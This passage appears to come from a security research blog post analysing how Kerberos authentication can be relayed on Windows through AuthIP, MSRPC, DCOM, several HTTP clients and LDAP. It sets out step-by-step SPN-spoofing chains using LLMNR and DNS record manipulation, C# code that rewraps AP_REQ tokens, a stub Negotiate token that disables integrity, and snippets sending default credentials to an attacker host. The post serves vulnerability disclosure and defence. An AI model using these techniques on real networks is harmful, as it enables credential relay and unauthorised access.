One actual issue for relaying is the Negotiate protocol enables integrity protection (equivalent to passing ISC_REQ_INTEGRITY to the underlying package) so that it can generate a Message Integrity Code (MIC) for the authentication exchange to prevent tampering. Using the Kerberos package directly won't add integrity protection automatically. Therefore relaying Kerberos AP_REQs from Negotiate will likely hit issues related to automatic enabling of signing on the server. It is possible for a client to explicitly disable automatic integrity checking by passing the ISC_REQ_NO_INTEGRITY request attribute, but that's not a common case.

It's possible to disable Negotiate from the relay if the client passes an arbitrary authentication token to the first call of the InitializeSecurityContext API. On the first call the Negotiate implementation will call the NegpDetermineTokenPackage function to determine whether to enable authentication pass through. If the initial token is NTLM or looks like a Kerberos token then it'll pass through directly to the underlying security package and it won't set ISC_REQ_INTEGRITY, unless the client explicitly requested it. The byte sequence [0x00, 0x01, 0x40] is sufficient to get Negotiate to detect Kerberos, and the token is then discarded so it doesn't have to contain any further valid data.

Sniffing and Proxying Traffic

Before going into individual protocols that I've researched, it's worth discussing some more obvious ways of getting access to Kerberos authentication targeted at other services. First is sniffing network traffic sent from client to the server. For example, if the Kerberos AP_REQ is sent to a service over an unencrypted network protocol and the attacker can view that traffic the AP_REQ could be extracted and relayed. The selection of the SPN will be based on the expected traffic so the attacker doesn't need to do anything to influence it.

The Kerberos authentication protocol has protections against this attack vector. The Kerberos AP_REQ doesn't just contain the service ticket, it's also accompanied by an Authenticator which is encrypted using the ticket's session key. This key is accessible by both the legitimate client and the service. The authenticator contains a timestamp of when it was generated, and the service can check if this authenticator is within an allowable time range and whether it has seen the timestamp already. This allows the service to reject replayed authenticators by caching recently received values, and the allowable time window prevents the attacker waiting for any cache to expire before replaying.

What this means is that while an attacker could sniff the Kerberos authentication on the wire and relay it, if the service has already received the authenticator it would be rejected as being a replay. The only way to exploit it would be to somehow prevent the legitimate authentication request from reaching the service, or race the request so that the attacker's packet is processed first.

Note, RFC4120 mentions the possibility of embedding the client's network address in the authenticator so that the service could reject authentication coming from the wrong host. This isn't used by the Windows Kerberos implementation as far as I can tell. No doubt it would cause too many false positives for the replay protection in anything but the simplest enterprise networks.

Therefore the only reliable way to exploit this scenario would be to actively interpose on the network communications between the client and service. This is of course practical and has been demonstrated many times assuming the traffic isn't protected using something like TLS with server verification. Various attacks would be possible such as ARP or DNS spoofing attacks or HTTP proxy redirection to perform the interposition of the traffic.

However, active MitM of protocols is a known risk and therefore an enterprise might have technical defenses in place to mitigate the issue. Of course, if such enterprises have enabled all the recommended relay protections,it's a moot point. Regardless, we'll assume that MitM is impractical for existing services due to protections in place and consider how individual protocols handle SPN selection.

IPSec and AuthIP

My research into Kerberos authentication relay came about in part because I was looking into the implementation of IPSec on Windows as part of my firewall research. Specifically I was researching the AuthIP ISAKMP which allows for Windows authentication protocols to be used to establish IPsec Security Associations.

I noticed that the AuthIP protocol has a GSS-ID payload which can be sent from the server to the client. This payload contains the textual SPN to use for the Kerberos authentication during the AuthIP process. This SPN is passed verbatim to the SSPI InitializeSecurityContext call by the AuthIP client.

As no verification is done on the format of the SPN in the GSS-ID payload, it allows the attacker to fully control the values including the service class and instance name. Therefore if an attacker can induce a domain joined machine to connect to an attacker controlled service and negotiate AuthIP then a Kerberos AP_REQ for an arbitrary SPN can be captured for relay use. As this AP_REQ is never sent to the target of the SPN it will not be detected as a replay.

Inducing authentication isn't necessarily difficult. Any IP traffic which is covered by the domain configured security connection rules will attempt to perform AuthIP. For example it's possible that a UDP response for a DNS request from the domain controller might be sufficient. AuthIP supports two authenticated users, the machine and the calling user. By default it seems the machine authenticates first, so if you convinced a Domain Controller to authenticate you'd get the DC computer account which could be fairly exploitable.

For interest's sake, the SPN is also used to determine the computer account associated with the server. This computer account is then used with Service For User (S4U) to generate a local access token allowing the client to determine the identity of the server. However I don't think this is that useful as the fake server can't complete the authentication and the connection will be discarded.

The security connection rules use IP address ranges to determine what hosts need IPsec authentication. If these address ranges are too broad it's also possible that ISAKMP AuthIP traffic might leak to external networks. For example if the rules don't limit the network ranges to the enterprise's addresses, then even a connection out to a public service could be accompanied by the ISAKMP AuthIP packet. This can be then exploited by an attacker who is not co-located on the enterprise network just by getting a client to connect to their server, such as through a web URL.

Diagram of a relay using a fake AuthIP server

To summarize the attack process from the diagram:

  1. Induce a client computer to send some network traffic to EVILHOST. It doesn't really matter what the traffic is, only that the IP address, type and port must match an IP security connection rule to use AuthIP. EVILHOST does not need to be domain joined to perform the attack.
  2. The network traffic will get the Windows IPsec client to try and establish a security association with the target host.
  3. A fake AuthIP server on the target host receives the request to establish a security association and returns a GSS-ID payload. This payload contains the target SPN, for example CIFS/FILESERVER.
  4. The IPsec client uses the SPN to create an AP_REQ token and sends it to EVILHOST.
  5. EVILHOST relays the Kerberos AP_REQ to the target service on FILESERVER.

Relaying this AuthIP authentication isn't ideal from an attacker's perspective. As the authentication will be used to sign and seal the network traffic, the request context flags for the call to InitializeSecurityContext will require integrity and confidentiality protection. For network protocols such as LDAP which default to requiring signing and sealing if the client supports it, this would prevent the relay attack from working. However if the service ignores the protection and doesn't have any further checks in place this would be sufficient.

This issue was reported to MSRC and assigned case number 66900. However Microsoft have indicated that it will not be fixed with a security bulletin. I've described Microsoft's rationale for not fixing this issue later in the blog post. If you want to reproduce this issue there's details on Project Zero's issue tracker.

MSRPC

After discovering that AuthIP could allow for authentication relay the next protocol I looked at is MSRPC. The protocol supports NTLM, Kerberos or Negotiate authentication protocols over connected network transports such as named pipes or TCP. These authentication protocols need to be opted into by the server using the RpcServerRegisterAuthInfo API by specifying the authentication service constants of RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_KERBEROS or RPC_C_AUTHN_GSS_NEGOTIATE respectively. When registering the authentication information the server can optionally specify the SPN that needs to be used by the client.

However, this SPN isn't actually used by the RPC server itself. Instead it's registered with the runtime, and a client can query the server's SPN using the RpcMgmtInqServerPrincName management API. Once the SPN is queried the client can configure its authentication for the connection using the RpcBindingSetAuthInfo API. However, this isn't required; the client could just generate the SPN manually and set it. If the client doesn't call RpcBindingSetAuthInfo then it will not perform any authentication on the RPC connection.

Aside, curiously when a connection is made to the server it can query the client's authentication information using the RpcBindingInqAuthClient API. However, the SPN that this API returns is the one registered by RpcServerRegisterAuthInfo and NOT the one which was used by the client to authenticate. Also Microsoft does mention the call to RpcMgmtInqServerPrincName in the "Writing a secure RPC client or server" section on MSDN. However they frame it in the context of mutual authentication and not to protect against a relay attack.

If a client queries for the SPN from a malicious RPC server it will authenticate using a Kerberos AP_REQ for an SPN fully under the attacker's control. Whether the AP_REQ has integrity or confidentiality enabled depends on the authentication level set during the call to RpcBindingSetAuthInfo. If this is set to RPC_C_AUTHN_LEVEL_CONNECT and the client uses RPC_C_AUTHN_GSS_KERBEROS then the AP_REQ won't have integrity enabled. However, if Negotiate is used or anything above RPC_C_AUTHN_LEVEL_CONNECT as a level is used then it will have the integrity/confidentiality flags set.

Doing a quick scan in system32 the following DLLs call the RpcMgmtInqServerPrincName API: certcli.dll, dot3api.dll, dusmsvc.dll, FrameServerClient.dll, L2SecHC.dll, luiapi.dll, msdtcprx.dll, nlaapi.dll, ntfrsapi.dll, w32time.dll, WcnApi.dll, WcnEapAuthProxy.dll, WcnEapPeerProxy.dll, witnesswmiv2provider.dll, wlanapi.dll, wlanext.exe, WLanHC.dll, wlanmsm.dll, wlansvc.dll, wwansvc.dll, wwapi.dll. Some basic analysis shows that none of these clients check the value of the SPN and use it verbatim with RpcBindingSetAuthInfo. That said, they all seem to use RPC_C_AUTHN_GSS_NEGOTIATE and set the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY which makes them less useful as an attack vector.

If the client specifies RPC_C_AUTHN_GSS_NEGOTIATE but does not specify an SPN then the runtime generates one automatically. This is based on the target hostname with the RestrictedKrbHost service class. The runtime doesn't process the hostname, it just concatenates strings and for some reason the runtime doesn't support generating the SPN for RPC_C_AUTHN_GSS_KERBEROS.

One additional quirk of the RPC runtime is that the request attribute flag ISC_REQ_USE_DCE_STYLE is used when calling InitializeSecurityContext. This enables a special three-leg authentication mode which results in the server sending back an AP_RET and then receiving another AP_RET from the client. Until that third AP_RET has been provided to the server it won't consider the authentication complete so it's not sufficient to just forward the initial AP_REQ token and close the connection to the client. This just makes the relay code slightly more complex but not impossible.

A second change that ISC_REQ_USE_DCE_STYLE introduces is that the Kerberos AP_REQ token does not have an GSS-API wrapper. This causes the call to NegpDetermineTokenPackage to fail to detect the package in use, making it impossible to directly forward the traffic to a server using the Negotiate package. However, this prefix is not protected against modification so the relay code can append the appropriate value before forwarding to the server. For example the following C# code can be used to convert a DCE style AP_REQ to a GSS-API format which Negotiate will accept.

public static byte[] EncodeLength(int length)

{

    if (length < 0x80)

        return new byte[] { (byte)length };

    if (length < 0x100)

        return new byte[] { 0x81, (byte)length };

    if (length < 0x10000)

        return new byte[] { 0x82, (byte)(length >> 8),

                            (byte)(length & 0xFF) };

    throw new ArgumentException("Invalid length", nameof(length));

}

public static byte[] ConvertApReq(byte[] token)

{

    if (token.Length == 0 || token[0] != 0x6E)

        return token;

    MemoryStream stm = new MemoryStream();

    BinaryWriter writer = new BinaryWriter(stm);

    Console.WriteLine("Converting DCE AP_REQ to GSS-API format.");

    byte[] header = new byte[] { 0x06, 0x09, 0x2a, 0x86, 0x48,

       0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x01, 0x00 };

    writer.Write((byte)0x60);

    writer.Write(EncodeLength(header.Length + token.Length));

    writer.Write(header);

    writer.Write(token);

    return stm.ToArray();

}

Subsequent tokens in the authentication process don't need to be wrapped; in fact, wrapping them with their GSS-API headers will cause the authentication to fail. Relaying MSRPC requests would probably be difficult just due to the relative lack of clients which request the server's SPN. Also when the SPN is requested it tends to be a conscious act of securing the client and so best practice tends to require the developer to set the maximum authentication level, making the Kerberos AP_REQ less useful.

DCOM

The DCOM protocol uses MSRPC under the hood to access remote COM objects, therefore it should have the same behavior as MSRPC. The big difference is DCOM is designed to automatically handle the authentication requirements of a remote COM object through binding information contained in the DUALSTRINGARRAY returned during Object Exporter ID (OXID) resolving. Therefore the client doesn't need to explicitly call RpcBindingSetAuthInfo to configure the authentication.

The binding information contains the protocol sequence and endpoint to use (such as TCP on port 30000) as well as the security bindings. Each security binding contains the RPC authentication service (wAuthnSvc in the below screenshot) to use as well as an optional SPN (aPrincName) for the authentication. Therefore a malicious DCOM server can force the client to use the RPC_C_AUTHN_GSS_KERBEROS authentication service with a completely arbitrary SPN by returning an appropriate security binding.

Screenshot of part of the MS-DCOM protocol documentation showing the SECURITYBINDING structure

The authentication level chosen by the client depends on the value of the dwAuthnLevel parameter specified if the COM client calls the CoInitializeSecurity API. If the client doesn't explicitly call CoInitializeSecurity then a default will be used which is currently RPC_C_AUTHN_LEVEL_CONNECT. This means neither integrity or confidentiality will be enforced on the Kerberos AP_REQ by default.

One limitation is that without a call to CoInitializeSecurity, the default impersonation level for the client is set to RPC_C_IMP_LEVEL_IDENTIFY. This means the access token generated by the DCOM RPC authentication can only be used for identification and not for impersonation. For some services this isn't an issue, for example LDAP doesn't need an impersonation level token. However for others such as SMB this would prevent access to files. It's possible that you could find a COM client which sets both RPC_C_AUTHN_LEVEL_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE though there's no trivial process to assess that.

Getting a client to connect to the server isn't trivial as DCOM isn't a widely used protocol on modern Windows networks due to high authentication requirements. However, one use case for this is local privilege escalation. For example you could get a privileged service to connect to the malicious COM server and relay the computer account Kerberos AP_REQ which is generated. I have a working PoC for this which allows a local non-admin user to connect to the domain's LDAP server using the local computer's credentials.

This attack is somewhat similar to the RemotePotato attack (which uses NTLM rather than Kerberos) which again Microsoft have refused to fix. I'll describe this in more detail in a separate blog post after this one.

HTTP

HTTP has supported NTLM and Negotiate authentication for a long time (see this draft from 2002 although the most recent RFC is 4559 from 2006). To initiate a Windows authentication session the server can respond to a request with the status code 401 and specify a WWW-Authenticate header with the value Negotiate. If the client supports Windows authentication it can use InitializeSecurityContext to generate a token, convert the binary token into a Base64 string and send it in the next request to the server with the Authorization header. This process is repeated until the client errors or the authentication succeeds.

In theory only NTLM and Negotiate are defined but a HTTP implementation could use other Windows authentication packages such as Kerberos if it so chose to. Whether the HTTP client will automatically use the user's credentials is up to the user agent or the developer using it as a library.

All the major browsers support both authentication types as well as many non browser HTTP user agents such as those in .NET and WinHTTP. I looked at the following implementations, all running on Windows 10 21H1:

  • WinINET (Internet Explorer 11)
  • WinHTTP (WebClient)
  • Chromium M93 (Chrome and Edge)
  • Firefox 91
  • .NET Framework 4.8
  • .NET 5.0 and 6.0

This is of course not an exhaustive list, and there's likely to be many different HTTP clients in Windows which might have different behaviors. I've also not looked at how non-Windows clients work in this regard.

There's two important behaviors that I wanted to assess with HTTP. First is how the user agent determines when to perform automatic Windows authentication using the current user's credentials. In order to relay the authentication it can't ask the user for their credentials. And second we want to know how the SPN is selected by the user agent when calling InitializeSecurityContext.

WinINET (Internet Explorer 11)

WinINET can be used as a generic library to handle HTTP connections and authentication. There's likely many different users of WinINET but we'll just look at Internet Explorer 11 as that is what it's most known for. WinINET is also the originator of HTTP Negotiate authentication, so it's good to get a baseline of what WinINET does in case other libraries just copied its behavior.

First, how does WinINET determine when it should handle Windows authentication automatically? By default this is based on whether the target host is considered to be in the Intranet Zone. This means any host which bypasses the configured HTTP proxy or uses an undotted name will be considered Intranet zone and WinINET will automatically authenticate using the current user's credentials.

It's possible to disable this behavior by changing the security options for the Intranet Zone to "Prompt for user name and password", as shown below:

Screenshot of the system Internet Options Security Settings showing how to disable automatic authentication

Next, how does WinINET determine the SPN to use for Negotiate authentication? RFC4559 says the following:

'When the Kerberos Version 5 GSSAPI mechanism [RFC4121] is being used, the HTTP server will be using a principal name of the form of "HTTP/hostname"'

You might assume therefore that the HTTP URL that WinINET is connecting to would be sufficient to build the SPN: just use the hostname as provided and combine with the HTTP service class. However it turns out that's not entirely the case. I found a rough description of how IE and WinINET actually generate the SPN in this blog. This blog post is over 10 years old so it was possible that things have changed, however it turns out to not be the case.

The basic approach is that WinINET doesn't necessarily trust the hostname specified in the HTTP URL. Instead it requests the canonical name of the server via DNS. It doesn't seem to explicitly request a CNAME record from the DNS server. Instead it calls getaddrinfo and specifies the AI_CANONNAME hint. Then it uses the returned value of ai_canonname and prefixes it with the HTTP service class. In general ai_canonname is the name provided by the DNS server in the returned A/AAAA record.

For example, if the HTTP URL is http://fileserver.domain.com, but the DNS A record contains the canonical name example.domain.com the generated SPN is HTTP/example.domain.com and not HTTP/fileserver.domain.com. Therefore to provide an arbitrary SPN you need to get the name in the DNS address record to differ from the IP address in that record so that IE will connect to a server we control while generating Kerberos authentication for a different target name.

The most obvious technique would be to specify a DNS CNAME record which redirects to another hostname. However, at least if the client is using a Microsoft DNS server (which is likely for a domain environment) then the CNAME record is not directly returned to the client. Instead the DNS server will perform a recursive lookup, and then return the CNAME along with the validated address record to the client.

Therefore, if an attacker sets up a CNAME record for www.evil.com, which redirects to fileserver.domain.com the DNS server will return the CNAME record and an address record for the real IP address of fileserver.domain.com. WinINET will try to connect to the HTTP service on fileserver.domain.com rather than www.evil.com which is what is needed for the attack to function.

I tried various ways of tricking the DNS client into making a direct request to a DNS server I controlled but I couldn't seem to get it to work. However, it turns out there is a way to get the DNS resolver to accept arbitrary DNS responses, via local DNS resolution protocols such as Multicast DNS (MDNS) and Link-Local Multicast Name Resolution (LLMNR).

These two protocols use a lightly modified DNS packet structure, so you can return a response to the name resolution request with an address record with the IP address of the malicious web server, but the canonical name of any server. WinINET will then make the HTTP connection to the malicious web server but construct the SPN for the spoofed canonical name. I've verified this with LLMNR and in theory MDNS should work as well.

Is spoofing the canonical name a bug in the Windows DNS client resolver? I don't believe any DNS protocol requires the query name to exactly match the answer name. If the DNS server has a CNAME record for the queried host then there's no obvious requirement for it to return that record when it could just return the address record. Of course if a public DNS server could spoof a host for a DNS zone which it didn't control, that'd be a serious security issue. It's also worth noting that this doesn't spoof the name generally. As the cached DNS entry on Windows is based on the query name, if the client now resolves fileserver.domain.com a new DNS request will be made and the DNS server would return the real address.

Attacking local name resolution protocols is a well known weakness abused for MitM attacks, so it's likely that some security conscious networks will disable the protocols. However, the advantage of using LLMNR this way over its use for MitM is that the resolved name can be anything. As in, normally you'd want to spoof the DNS name of an existing host, in our example you'd spoof the request for the fileserver name. But for registered computers on the network the DNS client will usually satisfy the name resolution via the network's DNS server before ever trying local DNS resolution. Therefore local DNS resolution would never be triggered and it wouldn't be possible to spoof it. For relaying Kerberos authentication we don't care, you can induce a client to connect to an unregistered host name which will fallback to local DNS resolution.

The big problem with the local DNS resolution attack vector is that the attacker must be in the same multicast domain as the victim computer. However, the attacker can still start the process by getting a user to connect to an external domain which looks legitimate then redirect to an undotted name to both force automatic authentication and local DNS resolving.

Diagram of the local DNS resolving attack against WinINET

To summarize the attack process as shown in the above diagram:

  1. The attacker sets up an LLMNR service on a machine in the same multicast domain at the victim computer. The attacker listens for a target name request such as EVILHOST.
  2. Trick the victim to use IE (or another WinINET client, such as via a document format like DOCX) to connect to the attacker's server on http://EVILHOST.
  3. The LLMNR server receives the lookup request and responds by setting the address record's hostname to the SPN target host to spoof and the IP address to the attacker-controlled server.
  4. The WinINET client extracts the spoofed canonical name, appends the HTTP service class to the SPN and requests the Kerberos service ticket. This Kerberos ticket is then sent to the attacker's HTTP service.
  5. The attacker receives the Negotiate/Kerberos authentication for the spoofed SPN and relays it to the real target server.

An example LLMNR response decoded by Wireshark for the name evilhost (with IP address 10.0.0.80), spoofing fileserver.domain.com (which is not address 10.0.0.80) is shown below:

Link-local Multicast Name Resolution (response)

    Transaction ID: 0x910f

    Flags: 0x8000 Standard query response, No error

    Questions: 1

    Answer RRs: 1

    Authority RRs: 0

    Additional RRs: 0

    Queries

        evilhost: type A, class IN

            Name: evilhost

            [Name Length: 8]

            [Label Count: 1]

            Type: A (Host Address) (1)

            Class: IN (0x0001)

    Answers

        fileserver.domain.com: type A, class IN, addr 10.0.0.80

            Name: fileserver.domain.com

            Type: A (Host Address) (1)

            Class: IN (0x0001)

            Time to live: 1 (1 second)

            Data length: 4

            Address: 10.0.0.80

You might assume that the SPN always having the HTTP service class would be a problem. However, the Active Directory default SPN mapping will map HTTP to the HOST service class which is always registered. Therefore you can target any domain joined system without needing to register an explicit SPN. As long as the receiving service doesn't then verify the SPN it will work to authenticate to the computer account, which is used by privileged services. You can use the following PowerShell script to list all the configured SPN mappings in a domain.

PS> $base_dn = (Get-ADRootDSE).configurationNamingContext

PS> $dn = "CN=Directory Service,CN=Windows NT,CN=Services,$base_dn"

PS> (Get-ADObject $dn -Properties sPNMappings).sPNMappings

One interesting behavior of WinINET is that it always requests Kerberos delegation, although that will only be useful if the SPN's target account is registered for delegation. I couldn't convince WinINET to default to a Kerberos only mode; sending back a WWW-Authenticate: Kerberos header causes the authentication process to stop. This means the Kerberos AP_REQ will always have Integrity enabled even though the user agent doesn't explicitly request it.

Another user of WinINET is Office. For example you can set a template located on an HTTP URL which will generate local Windows authentication if in the Intranet zone just by opening a Word document. This is probably a good vector for getting the authentication started rather than relying on Internet Explorer being available.

WinINET does have some feature controls which can be enabled on a per-executable basis which affect the behavior of the SPN lookup process, specifically FEATURE_USE_CNAME_FOR_SPN_KB911149 and

FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771. However these only seem to come into play if the HTTP connection is being proxied, which we're assuming isn't the case.

WinHTTP (WebDAV WebClient)

The WinHTTP library is an alternative to using WinINET in a client application. It's a cleaner API and doesn't have the baggage of being used in Internet Explorer. As an example client I chose to use the built-in WebDAV WebClient service because it gives the interesting property that it converts a UNC file name request into a potentially exploitable HTTP request. If the WebClient service is installed and running then opening a file of the form \\EVIL\abc will cause an HTTP request to be sent out to a server under the attacker's control.

From what I can tell the behavior of WinHTTP when used with the WebClient service is almost exactly the same as for WinINET. I could exploit the SPN generation through local DNS resolution, but not from a public DNS name record. WebDAV seems to consider undotted names to be Intranet zone, however the default for WinHTTP seems to depend on whether the connection would bypass the proxy. The automatic authentication decision is based on the value of the WINHTTP_OPTION_AUTOLOGON_POLICY policy.

At least as used with WebDAV WinHTTP handles a WWW-Authenticate header of Kerberos, however it ends up using the Negotiate package regardless and so Integrity will always be enabled. It also enables Kerberos delegation automatically like WinINET.

Chromium M93

Chromium based browsers such as Chrome and Edge are open source so it's a bit easier to check the implementation. By default Chromium will automatically authenticate to intranet zone sites, it uses the same Internet Security Manager used by WinINET to make the zone determination in URLSecurityManagerWin::CanUseDefaultCredentials. An administrator can set GPOs to change this behavior to only allow automatic authentication to a set of hosts.

The SPN is generated in HttpAuthHandlerNegotiate::CreateSPN which is called from HttpAuthHandlerNegotiate::DoResolveCanonicalNameComplete. While the documentation for CreateSPN mentions it's basically a copy of the behavior in IE, it technically isn't. Instead of taking the canonical name from the initial DNS request it does a second DNS request, and the result of that is used to generate the SPN.

This second DNS request is important as it means that we now have a way of exploiting this from a public DNS name. If you set the TTL of the initial host DNS record to a very low value, then it's possible to change the DNS response between the lookup for the host to connect to and the lookup for the canonical name to use for the SPN.

This will also work with local DNS resolution as well, though in that case the response doesn't need to be switched as one response is sufficient. This second DNS lookup behavior can be disabled with a GPO. If this is disabled then neither local DNS resolution nor public DNS will work as Chromium will use the host specified in the URL for the SPN.

In a domain environment where the Chromium browser is configured to only authenticate to Intranet sites we can abuse the fact that by default authenticated users can add new DNS records to the Microsoft DNS server through LDAP (see this blog post by Kevin Robertson). Using the domain's DNS server is useful as the DNS record could be looked up using a short Intranet name rather than a public DNS name meaning it's likely to be considered a target for automatic authentication.

One problem with using LDAP to add the DNS record is the time before the DNS server will refresh its records is at least 180 seconds. This would make it difficult to switch the response from a normal address record to a CNAME record in a short enough time frame to be useful. Instead we can add an NS record to the DNS server which forwards the lookup to our own DNS server. As long as the TTL for the DNS response is short the domain's DNS server will rerequest the record and we can return different responses without any waiting for the DNS server to update from LDAP. This is very similar to DNS rebinding attack, except instead of swapping the IP address, we're swapping the canonical name.

Diagram of two DNS request attack against Chromium

Therefore a working exploit as shown in the diagram would be the following:

  1. Register an NS record with the DNS server for evilhost.domain.com using existing authenticated credentials via LDAP. Wait for the DNS server to pick up the record.
  2. Direct the browser to connect to http://evilhost. This allows Chromium to automatically authenticate as it's an undotted Intranet host. The browser will lookup evilhost.domain.com by adding its primary DNS suffix.
  3. This request goes to the client's DNS server, which then follows the NS record and performs a recursive query to the attacker's DNS server.
  4. The attacker's DNS server returns a normal address record for their HTTP server with a very short TTL.
  5. The browser makes a request to the HTTP server, at this point the attacker delays the response long enough for the cached DNS request to expire. It can then return a 401 to get the browser to authenticate.
  6. The browser makes a second DNS lookup for the canonical name. As the original request has expired, another will be made for evilhost.domain.com. For this lookup the attacker returns a CNAME record for the fileserver.domain.com target. The client's DNS server will look up the IP address for the CNAME host and return that.
  7. The browser will generate the SPN based on the CNAME record and that'll be used to generate the AP_REQ, sending it to the attacker's HTTP server.
  8. The attacker can relay the AP_REQ to the target server.

It's possible that we can combine the local and public DNS attack mechanisms to only need one DNS request. In this case we could set up an NS record to our own DNS server and get the client to resolve the hostname. The client's DNS server would do a recursive query, and at this point our DNS server shouldn't respond immediately. We could then start a classic DNS spoofing attack to return a DNS response packet directly to the client with the spoofed address record.

In general DNS spoofing is limited by requiring the source IP address, transaction ID and the UDP source port to match before the DNS client will accept the response packet. The source IP address should be spoofable on a local network and the client's IP address can be known ahead of time through an initial HTTP connection, so the only problems are the transaction ID and port.

As most clients have a relatively long timeout of 3-5 seconds, that might be enough time to try the majority of the combinations for the ID and port. Of course there isn't really a penalty for trying multiple times. If this attack was practical then you could do the attack on a local network even if local DNS resolution was disabled and enable the attack for libraries which only do a single lookup such as WinINET and WinHTTP. The response could have a long TTL, so that when the access is successful it doesn't need to be repeated for every request.

I couldn't get Chromium to downgrade Negotiate to Kerberos only so Integrity will be enabled. Also since Delegation is not enabled by default, an administrator needs to configure an allow list GPO to specify what targets are allowed to receive delegated credentials.

A bonus quirk for Chromium: It seems to be the only browser which still supports URL based user credentials. If you pass user credentials in the request and get the server to return a request for Negotiate authentication then it'll authenticate automatically regardless of the zone of the site. You can also pass credentials using XMLHttpRequest::open.

While not very practical, this can be used to test a user's password from an arbitrary host. If the username/password is correct and the SPN is spoofed then Chromium will send a validated Kerberos AP_REQ, otherwise either NTLM or no authentication will be sent.

NTLM can be always generated as it doesn't require any proof the password is valid, whereas Kerberos requires the password to be correct to allow the authentication to succeed. You need to specify the domain name when authenticating so you use a URL of the form http://DOMAIN%5CUSER:[email protected]

One other quirk of this is you can specify a fully qualified domain name (FQDN) and user name and the Windows Kerberos implementation will try and authenticate using that server based on the DNS SRV records. For example http://EVIL.COM%5CUSER:[email protected] will try to authenticate to the Kerberos service specified through the _kerberos._tcp.evil.com SRV record. This trick works even on non-domain joined systems to generate Kerberos authentication, however it's not clear if this trick has any practical use.

It's worth noting that I did discuss the implications of the Chromium HTTP vector with team members internally and the general conclusion that this behavior is by design as it's trying to copy the behavior expected of existing user agents such as IE. Therefore there was no expectation it would be fixed.

Firefox 91

As with Chromium, Firefox is open source so we can find the implementation. Unlike the other HTTP implementations researched up to this point, Firefox doesn't perform Windows authentication by default. An administrator needs to configure either a list of hosts that are allowed to automatically authenticate, or the network.negotiate-auth.allow-non-fqdn setting can be enabled to authenticate to non-dotted host names.

If authentication is enabled it works with both local DNS resolving and public DNS as it does a second DNS lookup when constructing the SPN for Negotiate in nsAuthSSPI::MakeSN. Unlike Chromium there doesn't seem to be a setting to disable this behavior.

Once again I couldn't get Firefox to use raw Kerberos, so Integrity is enabled. Also Delegation is not enabled unless an administrator configures the network.negotiate-auth.delegation-uris setting.

.NET Framework 4.8

The .NET Framework 4.8 officially has two HTTP libraries, the original System.Net.HttpWebRequest and derived APIs and the newer System.Net.Http.HttpClient API. However in the .NET framework the newer API uses the older one under the hood, so we'll only consider the older of the two.

Windows authentication is only generated automatically if the UseDefaultCredentials property is set to true on the HttpWebRequest object as shown below (technically this sets the CredentialCache.DefaultCredentials object, but it's easier to use the boolean property). Once the default credentials are set the client will automatically authenticate using Windows authentication to any host, it doesn't seem to care if that host is in the Intranet zone.

var request = WebRequest.CreateHttp("http://www.evil.com");

request.UseDefaultCredentials = true;

var response = (HttpWebResponse)request.GetResponse();

The SPN is generated in the System.Net.AuthenticationState.GetComputeSpn function which we can find in the .NET reference source. The SPN is built from the canonical name returned by the initial DNS lookup, which means it supports the local but not public DNS resolution. If you follow the code it does support doing a second DNS lookup if the host is undotted, however this is only if the client code sets an explicit Host header as far as I can tell. Note that the code here is slightly different in .NET 2.0 which might support looking up the canonical name as long as the host name is undotted, but I've not verified that.

The .NET Framework supports specifying Kerberos directly as the authentication type in the WWW-Authentication header. As the client code doesn't explicitly request integrity, this allows the Kerberos AP_REQ to not have Integrity enabled.

The code also supports the WWW-Authentication header having an initial token, so even if Kerberos wasn't directly supported, you could use Negotiate and specify the stub token I described at the start to force Kerberos authentication. For example returning the following header with the initial 401 status response will force Kerberos through auto-detection:

WWW-Authenticate: Negotiate AAFA

Finally, the authentication code always enables delegation regardless of the target host.

.NET 5.0

The .NET 5.0 runtime has deprecated the HttpWebRequest API in favor of the HttpClient API. It uses a new backend class called the SocketsHttpHandler. As it's all open source we can find the implementation, specifically the AuthenticationHelper class which is a complete rewrite from the .NET Framework version.

To automatically authenticate, the client code must either use the HttpClientHandler class and set the UseDefaultCredentials property as shown below. Or if using SocketsHttpHandler, set the Credentials property to the default credentials. This handler must then be specified when creating the HttpClient object.

var handler = new HttpClientHandler();

handler.UseDefaultCredentials = true;

var client = new HttpClient(handler);

await client.GetStringAsync("http://www.evil.com");

Unless the client specified an explicit Host header in the request the authentication will do a DNS lookup for the canonical name. This is separate from the DNS lookup for the HTTP connection so it supports both local and public DNS attacks.

While the implementation doesn't support Kerberos directly like the .NET Framework, it does support passing an initial token so it's still possible to force raw Kerberos which will disable the Integrity requirement.

.NET 6.0

The .NET 6.0 runtime is basically the same as .NET 5.0, except that Integrity is specified explicitly when creating the client authentication context. This means that rolling back to Kerberos no longer has any advantage. This change seems to be down to a broken implementation of NTLM on macOS and not as some anti-NTLM relay measure.

HTTP Overview

The following table summarizes the results of the HTTP protocol research:

  • The LLMNR column indicates it's possible to influence the SPN using a local DNS resolver attack
  • DNS CNAME indicates a public DNS resolving attack
  • Delegation indicates the HTTP user agent enables Kerberos delegation
  • Integrity indicates that integrity protection is requested which reduces the usefulness of the relayed authentication if the target server automatically detects the setting.

User Agent

LLMNR

DNS CNAME

Delegation

Integrity

Internet Explorer 11 (WinINET)

Yes

No

Yes

Yes

WebDAV (WinHTTP)

Yes

No

Yes

Yes

Chromium (M93)

Yes

Yes

No

Yes

Firefox 91

Yes

Yes

No

Yes

.NET Framework 4.8

Yes

No

Yes

No

.NET 5.0

Yes

Yes

No

No

.NET 6.0

Yes

Yes

No

Yes

† Chromium and Firefox can enable delegation only on a per-site basis through a GPO.

‡ .NET Framework supports DNS resolving in special circumstances for non-dotted hostnames.

By far the most permissive client is .NET 5.0. It supports authenticating to any host as long as it has been configured to authenticate automatically. It also supports arbitrary SPN spoofing from a public DNS name as well as disabling integrity through Kerberos fallback. However, as .NET 5.0 is designed to be something usable cross platform, it's possible that few libraries written with it in mind will ever enable automatic authentication.

LDAP

Windows has a built-in general purpose LDAP library in wldap32.dll. This is used by the majority of OS components when accessing Active Directory and is also used by the .NET LdapConnection class. There doesn't seem to be a way of specifying the SPN manually for the LDAP connection using the API. Instead it's built manually based on the canonical name based on the DNS lookup. Therefore it's exploitable in a similar manner to WinINET via local DNS resolution.

The name of the LDAP server can also be found by querying for a SRV record for the hostname. This is used to support accessing the LDAP server from the top-level Windows domain name. This will usually return an address record alongside, all this does is change the server resolution process which doesn't seem to give any advantages to exploitation.

